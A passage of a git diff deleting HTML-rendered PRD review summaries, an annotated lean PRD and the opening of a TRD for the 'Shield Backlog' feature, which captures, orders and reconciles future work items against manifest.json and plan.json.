  • Section 12 — Dependencies
  • -
  • Section 13 — Risks & mitigations
  • -
  • Section 14 — Assumptions
  • -
  • Section 15 — Rollout plan (full — lean has its own §8 Milestones)
  • -
  • Section 16 — Cost & resource impact
  • -
  • Section 17 — GTM & customer-comms
  • -
  • Section 18 — Support / CX impact
  • -
-

If scope grows or stakeholders need more detail, run /prd again — Shield will offer to add specific sections or upgrade to standard.

-
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
deleted file mode 100644
index fdaf2b5a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html
+++ /dev/null
@@ -1,241 +0,0 @@
-Review — backlog-20260527

PRD Review — Shield Backlog

-

Source: docs/shield/backlog-20260527/prd.md (snapshot: source-prd.md)
PRD type: Lean (confirmed) · Date: 2026-05-27 · Reviewers: 13 dispatches (9 PM dims + agile-coach + tech-lead + dx-engineer + finops-analyst)

-

Verdict: Needs Work (composite 2.7, blocked by 1 P0)

-

Strong, well-scoped lean PRD with an unusually clean conceptual model (manifest = reconciliation key, epic = removal gate, no ids). It's held back by one Critical gap (no risks/assumptions treatment) and a cluster of consistency issues — several introduced by the recent rapid edits (the reconciliation trigger and "automatically" wording).

| Persona | Weight | Grade | Notes |
| --- | --- | --- | --- |
| product-manager (dims 1,2,3,7,8,11,12) | 1.0 | C (2.17) | dim 1 & 12 drag it down |
| agile-coach (dim 4) | 1.0 | B (3.0) | happy-path-only coverage |
| tech-lead (dims 5,6) | 1.0 | Informational | lean-exempt (real NFR notes below) |
| dx-engineer (anti-patterns) | 0.7 | B (3.0) | found edit-induced contradictions |
| finops-analyst (dim 13) | 0.7 | N/A | internal tool, no cost surface |
| Composite | | 2.69 | ≥2.5 but P0-gated → Needs Work |
-
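The 2.69 composite is consistent with a weighted mean over the personas that carry a numeric grade. The sketch below checks that arithmetic under one assumption: that the Informational (tech-lead) and N/A (finops-analyst) rows are excluded from both the numerator and the weight total. Whether Shield computes it this way is not stated in the review; the function name `composite` is hypothetical.

```python
# (persona, weight, numeric grade) for rows with a numeric grade in the table.
# Assumption: Informational and N/A rows do not contribute to the composite.
SCORED = [
    ("product-manager", 1.0, 2.17),
    ("agile-coach", 1.0, 3.0),
    ("dx-engineer", 0.7, 3.0),
]


def composite(rows: list[tuple[str, float, float]]) -> float:
    """Weighted mean: sum(weight * grade) / sum(weight)."""
    total_weight = sum(weight for _, weight, _ in rows)
    return sum(weight * grade for _, weight, grade in rows) / total_weight


print(round(composite(SCORED), 2))  # 2.69, i.e. (2.17 + 3.0 + 2.1) / 2.7
```

Rounded to one decimal this gives the 2.7 quoted in the verdict line.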

Per-dimension grades

| Dim | Name | Grade | Dim | Name | Grade |
| --- | --- | --- | --- | --- | --- |
| 1 | Problem clarity | D | 8 | Legal/privacy | N/A |
| 2 | Scope boundaries | B | 9 | GTM | informational |
| 3 | Measurable success | C | 10 | Support/CX | informational |
| 4 | Scenario coverage & AC | B | 11 | Why now | C |
| 5 | NFR coverage | informational | 12 | Risks & assumptions | D |
| 6 | Rollout & ops | informational | 13 | Cost | informational |
| 7 | RACI & approvals | A | | | |
-
-

P0 — must fix before /plan (1)

-

P0-1 · Dim 12a · Risks & assumptions (Critical, F). No risks section: failure modes appear only as §7 counter-metrics, with no mitigations or named owners, and no validated/unvalidated assumptions framing.
→ Add a short lean risks table — each risk + mitigation + owner — and an assumptions list. The load-bearing unvalidated assumption is the whole no-hooks bet: "agents reliably surface follow-ups conversationally." Mitigations mostly already exist (reconciliation-on-view → graveyard risk; atomic write → corruption).

-

P1 — should fix for quality (8)

-
  • P1-1 · Dim 1b (Important, F). Problem stated with zero baseline numbers. → Add one figure, e.g. "~N follow-ups lost across the last M /implement runs."
  • P1-2 · Dim 1a (Critical, C). Personas are role categories, not a named persona. → Name P1 concretely (e.g. "Ashwini, Shield maintainer running /implement daily").
  • P1-3 · Dim 3a (Critical, C). Three of four metrics use vague targets ("Majority", "often enough", "one step"). → Attach numbers + a time horizon (e.g. "≥70% reach a terminal state within 30 days").
  • P1-4 · Dim 3d (Warning, F). No tracking owner/cadence for the metrics. → Name how it's measured (e.g. periodic /backlog audit, or git history of backlog.json).
  • P1-5 · Dim 11a/11b (Critical/Important, C). Why-now describes a standing gap, not a concrete trigger; cost-of-inaction unquantified. → Anchor to a real recent instance of lost follow-up work.
  • P1-6 · Dim 12b (Important, D). No validated-vs-unvalidated assumptions split. → See P0-1 fix.
  • P1-7 · Dim 4a (Critical, C) + 4b (Important, C). Flows are happy-path only; edge cases (missing plan.json, abandoned capture, concurrent writes to the single global backlog.json, two features sharing an epic id) unaddressed. → Add ≥1 error path per core flow; resolve the ordering-collision open question.
  • P1-8 · DX / matching rule (P1). With ids removed, the PRD never says how a proposed-new epic name is matched to the eventual real epic in plan.json — this is the central removal-correctness decision and is left implicit. → Specify the match key (string match? user-confirmed at promotion?).
-

P2 — nice to have (4)

-
  • Dim 2b (Critical, B). Several §10 out-of-scope items are bare; add a one-line why-deferred each.
  • Dim 2c (Warning, F). No scope-creep guard naming the likely creep ask + decision authority (@ashwinimanoj).
  • Dim 7c (Important, B). Sign-off N/A names no confirmer → "N/A — internal tooling (confirmed by @ashwinimanoj)".
  • Dim 12c (Warning, B). Promote resolved §9 open questions into a short decision log.
-
-

DX anti-patterns (cross-cutting)

-

Two of these were introduced by the recent edits — worth fixing before /plan:

-
  1. (P1) M3 vs §9 contradiction. §8 M3 states "/backlog reconciles on view" as settled, but §9 still lists the reconciliation trigger as Open ("on view / end of /plan / both"). A developer can't implement M3 against an unsettled trigger. → Resolve §9 or soften M3.
  2. (P2) "removed automatically" vs user-triggered. §6 says entries are "removed automatically," but reconciliation runs on /backlog view (a user action) — and §6's own non-goal disclaims "automatic surfacing machinery." → Replace "automatically" with "on next /backlog view."
  3. (P1) kind field undefined but assumed settled. §6 + M1 commit to "epic/story/task granularity" and M1 says "schema defined," yet §9 leaves the backing kind field open. → Decide kind before M1.
  4. (P1) Capture-from-skill interface undefined. M1 requires capture "usable from any Shield skill" but no command/helper/write-contract is specified. → Define the capture entrypoint.
  5. (P1) Reconciliation match key — see P1-8.
  6. (P1) Unfalsifiable metrics — see P1-3.
-

Clarity strengths (keep): problem-first ordering; the feature=key / epic=gate distinction is load-bearing and well-defined; non-goals are thorough with rationale; lean exemptions are explicit and correct.

-

Tech-lead NFR notes (informational, lean-exempt — but real)

-

Not gating, but cheap to fold in now since the plan will need them:

-
  • Atomic write + concurrency for backlog.json (write-temp-then-rename; concurrent capture vs reconcile-rewrite is the primary failure case).
  • Schema versioning — add schema_version so the open §9 shape decisions (ordering, kind) can evolve via read-old/write-new.
  • Read-contract drift — reconciliation should no-op (never remove) if manifest.json/plan.json are missing or an older shape, not error.
  • Recovery posture: backlog.json is git-tracked, so a bad reconciliation is git revert-able; consider a dry-run/confirm before reconcile removals in v1.
-
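The read-contract note above (no-op instead of erroring on a missing or older-shaped file) could be implemented with a guard along these lines. This is a minimal sketch under stated assumptions: the helper name `load_if_current` and its parameters are hypothetical, and the expected version value and required keys would come from the real schemas, which this patch does not show in full.

```python
import json
from pathlib import Path
from typing import Any, Optional


def load_if_current(
    path: Path, expected_version: Any, required_keys: tuple[str, ...]
) -> Optional[dict]:
    """Return the parsed document, or None if it is missing, unreadable, or an unexpected shape.

    A None result tells the caller to skip reconciliation entirely,
    so no backlog entry is removed on incomplete information.
    """
    try:
        doc = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):  # missing file, bad encoding, or invalid JSON
        return None
    if not isinstance(doc, dict):
        return None
    if doc.get("schema_version") != expected_version:
        return None
    if any(key not in doc for key in required_keys):
        return None
    return doc
```

A caller would treat `None` as "leave the backlog untouched", for example `manifest = load_if_current(root / "manifest.json", 1, ("features",))` followed by an early return when the result is `None`. The version value `1` there is illustrative only.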
- -
  1. Fix P0-1 (risks/assumptions) and the two edit-induced contradictions (#1, #2) — all small.
  2. Resolve the three M1-gating open questions (kind, ordering, reconciliation trigger) or mark them deferred-with-default.
  3. Specify the epic match key (P1-8) — it's the correctness heart of reconciliation.
  4. Re-run /prd-review or proceed to /plan once P0 is cleared.
-

Files: summary.md (this), enhanced-prd.md (annotated), review-comments.json, detailed/*.md ×5.

- -
-
diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
deleted file mode 100644
index c1857896..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html
+++ /dev/null
@@ -1,364 +0,0 @@
-Shield PRD Review
Shield PRD Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/prd/2026-05-27/)
-

Shield Backlog

- -

1. Header

| Field | Value |
| --- | --- |
| Owner | @ashwinimanoj |
| Status | Draft |
| PRD type | Lean |
| Date created | 2026-05-27 |
| Last updated | 2026-05-27 |
| Linked design spec | null |
| Linked research | null |
| Decision-maker | @ashwinimanoj |
| Sign-off contacts | (n/a for internal tooling) |
| Linked plans | (auto-populated by /plan) |
-

2. Terminologies

| Term | Definition |
| --- | --- |
| Backlog | A project-level, ordered list of future work captured across the Shield workflow. Lives at docs/shield/backlog.json. |
| Backlog entry | One captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a kind hint (epic \| story \| task), a source (user \| agent), and a feature + epic association (either may be proposed-new until promotion). |
| Feature association | The feature an entry belongs to (a docs/shield/<feature>/ folder). It is the reconciliation key: manifest.json is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion. |
| Epic association | The epic an entry slots into when planned — an existing epic id (e.g. EPIC-2) or a proposed new epic. Acts as the gate at reconciliation: the entry is removed only when this epic's work appears in the feature's plan.json. |
| Promotion | Acting on a backlog entry by starting the appropriate Shield step for it — /research, /prd, /plan, or /implement. The user decides which step; the backlog does not auto-route. |
| Reconciliation | Keeping the backlog current: manifest.json locates the entry's feature and whether it has a plan.json; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's plan.json (epics[].stories[]). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by epic id, a proposed-new-epic entry matches by epic name (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A prd-only feature does not trigger removal. Removal fires at the end of the /plan or /implement run promoted from the entry, or on the /backlog view sweep. |
| Agent-discovered entry | A backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry). |
-
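The reconciliation rule defined above (match by feature, then by epic id or epic name, and keep the entry on any doubt) can be sketched as a single predicate. The entry keys `feature`, `epic_id`, and `epic_name`, the plan keys `id` and `name`, and the name normalisation are assumptions made for illustration. The PRD only fixes `epics[].stories[]` and the "never remove on doubt" behaviour.

```python
from typing import Any


def _norm(name: str) -> str:
    """Case- and whitespace-insensitive form of an epic name (assumed normalisation)."""
    return " ".join(name.casefold().split())


def should_remove(entry: dict[str, Any], manifest: dict[str, Any], plans: dict[str, Any]) -> bool:
    """True only when the entry's epic is unambiguously present, with stories, in its feature's plan."""
    feature = next(
        (f for f in manifest.get("features", []) if f.get("name") == entry.get("feature")),
        None,
    )
    # Unknown or prd-only feature: never remove.
    if feature is None or feature.get("artifacts", {}).get("plan_json") is not True:
        return False
    plan = plans.get(entry["feature"])
    if not isinstance(plan, dict):
        return False
    epics = plan.get("epics", [])
    epic_id = entry.get("epic_id")
    epic_name = _norm(entry.get("epic_name") or "")
    if epic_id:  # existing-epic entry: match by id
        matches = [e for e in epics if e.get("id") == epic_id]
    elif epic_name:  # proposed-new-epic entry: match by name
        matches = [e for e in epics if _norm(e.get("name") or "") == epic_name]
    else:
        return False
    # Zero matches or several matches both count as doubt, so the entry stays.
    return len(matches) == 1 and bool(matches[0].get("stories"))
```

Requiring exactly one match with a non-empty `stories` list is one reading of "its epic's work appears in the plan". A stricter or looser test may be intended.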

3. Problem & context

-

Future work surfaces constantly while using Shield — during /research, while writing a PRD, mid-/plan, and especially during /implement ("we should also handle X later", "this whole area needs a rewrite"). Today there is nowhere to park that work. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.

-

Concretely:

-
    -
  • There is no project-level, ordered place to capture "not now, but later" items. plan.json only holds work already committed to a milestone; manifest.json is an artifact index. Neither captures un-triaged future work.
  • -
  • Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.
  • -
  • When future work is remembered, there's no consistent path from "loose idea" to "stories in a plan." Each pickup re-derives the epic, the feature, and the scope from scratch.
  • -
-

Why now: Shield's pipeline (/research → /prd → /plan → /implement) is mature, but it only handles work that's already been decided on. The gap is the staging area before that pipeline — where future work waits, ordered, until the user promotes it in.

-

4. Target users / personas

| ID | Persona | Goals | Frictions today |
| --- | --- | --- | --- |
| P1 | Ashwini — Shield maintainer running /research//plan//implement daily | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered "later" list at the project level |
| P2 | The agent (Claude) running a Shield task | Record follow-up work it discovers mid-task so the human doesn't have to remember it | Discovered work is mentioned once in chat then forgotten; no place to persist it |
-

5. Architecture & flows

-

A single global store docs/shield/backlog.json (sibling to manifest.json), a /backlog command to view it, a capture path usable from any Shield skill or by the user, and a user-driven promotion: the user picks an entry and starts whichever Shield step fits — /research, /prd, /plan, or /implement. Each entry carries an order, a source (user | agent), and a feature + epic association. Reconciliation reads manifest.json as the project-level index — to find each entry's feature, see whether it has a plan.json, and surface its pipeline status (research/prd/plan) in the /backlog view — then opens the flagged plan.json and removes any entry whose epic's work now appears there. A prd-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via /plan or /implement is pruned at the end of that run (the command carries the entry as a transient promotion reference); the /backlog view sweep is the lazy safety net for work that landed without an explicit reference; and a manual remove clears ideas decided against or anything not tied to a promotion run.

-
flowchart LR
-  cap["Capture<br/>(user or agent, anytime)"] --> bl["backlog.json<br/>(ordered, project-level)"]
-  bl --> view["/backlog<br/>(ordered list +<br/>per-entry pipeline status)"]
-  man["manifest.json<br/>(feature index:<br/>research/prd/plan)"] --> view
-  bl --> dec{"User decides<br/>next step"}
-  dec --> research["/research"]
-  dec --> prd["/prd"]
-  dec --> plan["/plan"]
-  dec --> impl["/implement"]
-  man --> rec["Reconcile → remove from backlog:<br/>end of promoted /plan or /implement,<br/>or /backlog sweep (work now in plan.json)"]
-  plan --> rec
-  impl --> rec
-  rec --> bl
-
-

6. Goals & non-goals

-

Goals

-
    -
  • Capture future work (epic / story / task granularity) at any point in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.
  • -
  • Support both capture sources: user-created and agent-discovered.
  • -
  • Keep the backlog ordered so there's a clear "what to pick up next."
  • -
  • Every entry is associated with a feature and an epic — existing or proposed-new — and the agent suggests a matching feature/epic at capture or promotion time.
  • -
  • A /backlog command shows the current backlog, ordered, with each entry's feature + epic association, source, and pipeline status (research / prd / plan, read from manifest.json) — so you can see what's been started (e.g. a prd written) without the entry being removed.
  • -
  • Provide a user-driven promotion path: the user picks an entry and starts the Shield step they judge appropriate (/research, /prd, /plan, or /implement). The backlog suggests, but does not dictate, the next step.
  • -
  • Keep the backlog current: an entry promoted via /plan or /implement is removed at the end of that run; the /backlog view also sweeps out any entry whose work has since landed in a plan.json. The backlog reflects only not-yet-committed work.
  • -
  • Manual remove: any entry can be explicitly removed from /backlog — covers ideas decided against and entries not cleared by a promotion run.
  • -
-

Non-goals

-
    -
  • Automatic end-of-task surfacing machinery (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.
  • -
  • Per-feature backlogs. v1 is a single global backlog.
  • -
  • A status/workflow engine. The lifecycle is minimal: an entry exists until it is removed — at the end of the /plan or /implement it was promoted from, by the /backlog sweep once its work is in a plan.json, or manually. No multi-state machine.
  • -
  • Syncing the backlog to the PM tool (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing /pm-sync on the resulting plan.
  • -
  • Replacing the PM tool's own backlog. This is Shield-local triage, not a project-management backlog of record.
  • -
-

7. Success metrics

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Metric | Type | Target | Counter |
|---|---|---|---|
| Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rot | Outcome | ≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; <20% sit untouched >60 days | Entries pile up un-triaged → backlog becomes a graveyard |
| Entries carrying a feature + epic association at promotion time | Quality | 100%: promotion cannot complete without a feature and epic | Forcing association makes capture so heavy nobody captures |
| Agent feature/epic-suggestion acceptance | Quality | ≥60% of agent feature/epic suggestions accepted without override | Bad suggestions that users routinely override |
| Capture friction | Adoption | Capture is a single /backlog add (or one agent action) and never blocks the current task | Capture is so quick the backlog fills with low-signal noise |
-

Measurement (v1): no telemetry — metrics are tracked manually via a periodic /backlog audit and the git history of backlog.json (entry add/remove commits). Owner: @ashwinimanoj.

-

8. Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| ID | Name | Outcome | Exit criteria | Depends on |
|---|---|---|---|---|
| M1 | Capture + store + view | A global backlog.json exists; entries can be added (user + agent) with order, source, and feature + epic association; /backlog shows the ordered list with per-entry pipeline status from manifest.json | backlog.json schema defined; an entry can be captured from a skill or by the user; /backlog renders the ordered backlog with feature + epic and a research/prd/plan status read from manifest.json; an entry can be manually removed from /backlog | |
| M2 | Feature + epic association + suggestion | Every entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epic | Capture prompts for a feature + epic; agent scans manifest.json features and known epics and proposes a match; user can accept, pick another, or create-new | M1 |
| M3 | Promotion + reconciliation | The user picks an entry and starts the Shield step they choose (/research, /prd, /plan, or /implement); once the entry's epic's work appears in the feature's plan.json, it is removed from the backlog | Reconciliation uses manifest.json (find feature, has-plan?) + plan.json (epic present?), with no ids stamped; a prd-only feature is not removed; removal fires eagerly at the end of the /plan or /implement run promoted from the entry and lazily on the /backlog sweep; the user-chosen step is never overridden | M2 |
-

9. Open questions

-

Decided (locked for v1)

-
    -
  • Reconciliation triggers: an entry is removed (a) eagerly at the end of the /plan or /implement run it was promoted from — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) lazily by the /backlog view sweep, which prunes any entry whose epic's work is now in a plan.json (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into plan.json.
  • -
  • Reconciliation match key: feature (via manifest.json) + epic. Existing-epic entries match by epic id; proposed-new-epic entries match by epic name (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.
  • -
  • Ordering scheme: a single explicit integer order field per entry (like orderindex); no priority buckets in v1.
  • -
  • Entry granularity: entries carry a kind hint (epic | story | task); promotion always yields ≥1 story regardless of kind.
  • -
  • Shippable work routes through /plan: anything that produces stories is promoted via /plan so it lands in plan.json (the lazy-sweep signal) and is pruned at the end of that /plan run. Direct /implement stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the /implement run too.
  • -
  • Manual remove: /backlog supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.
  • -
-

Still open

-
    -
  • Feature/epic discovery cost. Epics live inside per-feature plan.json, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged plan.json files; add a project-level epic index only if this gets slow.)
  • -
  • Dropped/rejected entries. Do we need an explicit terminal state for "decided against," or is deleting the entry enough? (Deferred — see §11 Out of scope.)
  • -
-

10. Risks & assumptions

-

Risks

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Risk | Mitigation | Owner |
|---|---|---|
| Backlog becomes a graveyard (captured, never acted on) | Reconciliation prunes plan-committed work on /backlog view; periodic audit surfaces stale entries; §7 counter-metric tracks it | @ashwinimanoj |
| Concurrent writes corrupt backlog.json (capture racing reconciliation) | Atomic write (temp-then-rename); validate-or-refuse on read; backlog.json is git-tracked so corruption is revertable | @ashwinimanoj |
| Reconciliation wrongly removes an entry (epic-name collision / ambiguous match) | Match on feature + epic only; never remove on ambiguity (entry stays); git revert recovers any bad removal | @ashwinimanoj |
| Capture friction too high → nobody captures | Single-step capture; agent can capture without prompting | @ashwinimanoj |
-

Assumptions

-
    -
  • (unvalidated) Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.
  • -
  • (unvalidated) The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own backlog.json history will validate it.
  • -
  • (assumed stable) Epic names in plan.json are stable enough to serve as the proposed-new-epic match key (see §9).
  • -
  • (validated) manifest.json is feature-keyed and plan.json carries epics[].stories[] — confirmed against the current schema.
  • -
-

11. Out of scope / Non-goals

-
    -
  • Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).
  • -
  • /pm-sync of backlog entries to the PM tool before promotion.
  • -
  • Cross-project / multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).
  • -
-
-
-

This is a lean PRD. It intentionally omits the following standard sections:

-
    -
  • Section 8 — User stories & scenarios
  • -
  • Section 9 — Functional requirements
  • -
  • Section 10 — Non-functional requirements
  • -
  • Section 11 — RBAC & permissions matrix
  • -
  • Section 12 — Dependencies
  • -
  • Section 13 — Risks & mitigations
  • -
  • Section 14 — Assumptions
  • -
  • Section 15 — Rollout plan (full — lean has its own §8 Milestones)
  • -
  • Section 16 — Cost & resource impact
  • -
  • Section 17 — GTM & customer-comms
  • -
  • Section 18 — Support / CX impact
  • -
-

If scope grows or stakeholders need more detail, run /prd again — Shield -will offer to add specific sections or upgrade to standard.

-
- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html deleted file mode 100644 index 1cd1edb0..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html +++ /dev/null @@ -1,203 +0,0 @@ - - - - - -Review — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

PRD Review — Shield Backlog (re-review)

-

Source: docs/shield/backlog-20260527/prd.md (snapshot: source-prd.md) -PRD type: Lean · Date: 2026-05-27 (run _2) · Reviewers: 13 dispatches -Prior run: reviews/prd/2026-05-27/ — Needs Work (2.7, 1 P0)

-

Verdict: Ready (composite 3.1, 0 P0s)

-

The P0 is cleared and the edits landed cleanly. Composite rose 2.7 → 3.1; the product-manager persona went C → B as the three flagged dims recovered. One residual contradiction from the rapid editing remains as a P1 (cheap fix), and the capture-from-skill interface is the main thing /plan will need to pin down.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
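| Persona | Weight | Run 1 | Run 2 |
|---|---|---|---|
| product-manager | 1.0 | C (2.17) | B (3.33) |
| agile-coach | 1.0 | B | B (3.0) |
| tech-lead | 1.0 | Informational | Informational |
| dx-engineer | 0.7 | B | B (3.0) |
| finops-analyst | 0.7 | N/A | N/A |
| Composite | | 2.69 | 3.12 |
| P0s | | 1 | 0 |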
-

Per-dimension (Δ vs run 1)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Dim | Name | Run 1 → Run 2 |
|---|---|---|
| 1 | Problem clarity | D → C |
| 2 | Scope boundaries | B → A |
| 3 | Measurable success | C → A |
| 4 | Scenario coverage & AC | B → B |
| 7 | RACI & approvals | A → A |
| 11 | Why now | C → C |
| 12 | Risks & assumptions | D → A (P0 cleared) |
| 5,6,9,10,13 | (NFR/ops/GTM/CX/cost) | informational/N/A (lean) |
| 8 | Legal/privacy | N/A |
-

What the fixes resolved: §10 Risks & assumptions (risks+mitigations+owner, validated/unvalidated tags) cleared the P0 (12a F→A, 12b→A); numeric metric targets + measurement owner (3a/3d) lifted dim 3 C→A; the named persona (1a A) and the why-deferred/scope content lifted dims 1 and 2.

-
-

No P0s. Remaining items (all non-blocking)

-

P1 (3)

-
    -
  • P1-1 · §2 residual contradiction (DX). §2 Epic association still says the entry "is removed only when this epic's work appears in plan.json" — but we added a manual remove trigger (ideas decided against never hit a plan). Leftover from the earlier gate-only model. → Change "only when" to "when" or add "(or removed manually)". Cheap, and I introduced it — recommend fixing now.
  • -
  • P1-2 · Capture-from-skill interface undefined (DX). §5/§8 require capture "usable from any Shield skill" but no command/helper/write-contract is specified. → Define the capture entrypoint (this is the main /plan-level unknown).
  • -
  • P1-3 · Problem baseline still unquantified (1b, C; 11a/11b, C). Honestly logged as an unvalidated assumption rather than measured. Acceptable for v1, but a single real figure from past /implement transcripts would harden the "why now."
  • -
-

P2 (4)

-
    -
  • §2/§5 eager-removal "promotion reference" mechanism is prose-only (how /plan//implement receive + act on it). Pin in /plan/TRD.
  • -
  • State that eager-prune and the /backlog sweep are idempotent (remove-if-present) so they can't double-remove or race.
  • -
  • 2c — no explicit scope-creep guard naming the likely creep ask + decision authority.
  • -
  • 7c — sign-off N/A names no confirmer; 3d — audit cadence vague ("periodic").
  • -
-

Tech-lead NFR notes (informational, lean-exempt — good /plan/TRD inputs)

-
    -
  • Schema versioning (6e): add schema_version to backlog.json now + a migration policy — cheap at definition, expensive to retrofit.
  • -
  • Read-contract drift (6f): reconciliation should treat unrecognized manifest.json/plan.json shapes as "doubt → entry stays," never crash/guess.
  • -
  • Perf budget (5a): state a /backlog sweep budget (e.g. <1s up to ~50 features) to trigger the §9 "add an index if slow" decision.
  • -
  • Rollback (6c): name a one-line trigger — if eager prune wrongly removes and git-revert is costly, fall back to manual-remove-only.
  • -
-
-

DX consistency check (the reason we re-reviewed)

-

The three-trigger removal model is now consistent across §5, §5-mermaid, §6, §8 M3, and §9 — the earlier "on /backlog view only" wording is fully gone, and the proposed-new-epic match key + "never remove on doubt" invariant are stated consistently in §2/§9/§10. The only residual leftover is the §2 "only when" phrasing (P1-1).

-

Recommendation

-

Ready for /plan. Optionally fix P1-1 first (one-line, mine to fix) and decide the capture interface (P1-2) — though that one is legitimately /plan/TRD-level. The tech-lead schema-versioning + read-contract notes should be carried into the TRD.

-

Files: summary.md · enhanced-prd.md · review-comments.json · detailed/*.md ×5.

- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/trd.html b/docs/shield/backlog-20260527/outputs/trd.html deleted file mode 100644 index 1aea5509..00000000 --- a/docs/shield/backlog-20260527/outputs/trd.html +++ /dev/null @@ -1,531 +0,0 @@ - - - - - -TRD — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - - -

TRD — Shield Backlog

-
-

In one line: a project-level "later" list (docs/shield/backlog.json) that -captures future work from anywhere in the Shield workflow, shows it ordered with -per-entry pipeline status, and prunes itself when that work lands in a plan — so -ideas stop getting lost without becoming a graveyard.

-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Field | Value |
|---|---|
| Project | Shield |
| Feature | backlog-20260527 |
| Domain | backend (Python) |
| Owner | @ashwinimanoj |
| Linked PRD | ./prd.md (reviewed Ready, composite 3.12) |
| Linked plan | ./plan.md · Sidecar: ./plan.json |
| Status | Draft |
-

§1 Document Overview {#document-overview}

-

This TRD covers Shield Backlog v1 — a single project-level store of future work, -a /backlog command to view and curate it, a capture path callable by the user or by -any Shield skill, a user-driven promotion path, and a reconciliation engine that prunes -entries once their work commits to a plan. It is read by the Shield maintainer -(@ashwinimanoj) and by any contributor implementing the /backlog command, the -backlog_store, the epic-suggester, or the reconciler.

-

It derives its problem framing, users, goals, and risks from the linked PRD -(./prd.md, lean, reviewed Ready) and translates them into testable -functional/non-functional requirements, a component design, and a ship plan. The -execution breakdown (epics, stories, acceptance criteria) lives in -./plan.md and its sidecar ./plan.json; this document -stays at the "what fits where and why" level — component-internal detail lives in the -three LLD drafts (./lld-backlog-store.md, -./lld-epic-suggester.md, -./lld-reconciler.md).

-

§2 Problem Statement {#problem-statement}

-

Shield's pipeline (/research → /prd → /plan → /implement) only acts on work that has -already been decided on. There is no staging area upstream of it: plan.json -holds only milestone-committed work, and manifest.json is an artifact index — neither -models an un-triaged "do this later" item. The technical gap is therefore a missing -ordered, project-level, persistent queue that any pipeline step (or the agent -mid-task) can append to without derailing the current task, and that drains itself once -an item's work reaches a plan.

-

See PRD §3 Problem & context for the user-facing narrative (lost ideas, -mid-/implement "we should also handle X later", no consistent path from loose idea to -planned stories). This section restates only the engineering shape of that gap: a -capture-anywhere write surface + an ordered store + a removal gate keyed off existing -Shield artifacts.

-

§3 Objective & Scope {#objective-scope}

-

Deliver a global backlog store, a /backlog view/curate command, a -user-and-agent capture path, a feature+epic association with agent suggestion, and a -promotion+reconciliation loop that keeps the backlog reflecting only not-yet-committed -work.

-

In scope

-
    -
  • A single global store docs/shield/backlog.json with a versioned JSON Schema and a Python validator.
  • -
  • A capture path: /backlog add (user) and a documented capture() write helper (skills/agent), atomic and validate-or-refuse.
  • -
  • /backlog view: ordered list, per-entry feature+epic+source, and pipeline-status badges read from manifest.json.
  • -
  • Feature+epic association (either may be proposed-new) with exact-normalized agent suggestion.
  • -
  • User-driven promotion (the user picks /research|/prd|/plan|/implement); a transient promotion reference.
  • -
  • A reconciliation engine + eager prune, lazy sweep, manual remove, and a kill switch.
  • -
  • An executable eval suite + version bump.
  • -
-

Out of scope (per PRD §6/§11)

-
    -
  • Hooks / automatic end-of-task surfacing machinery.
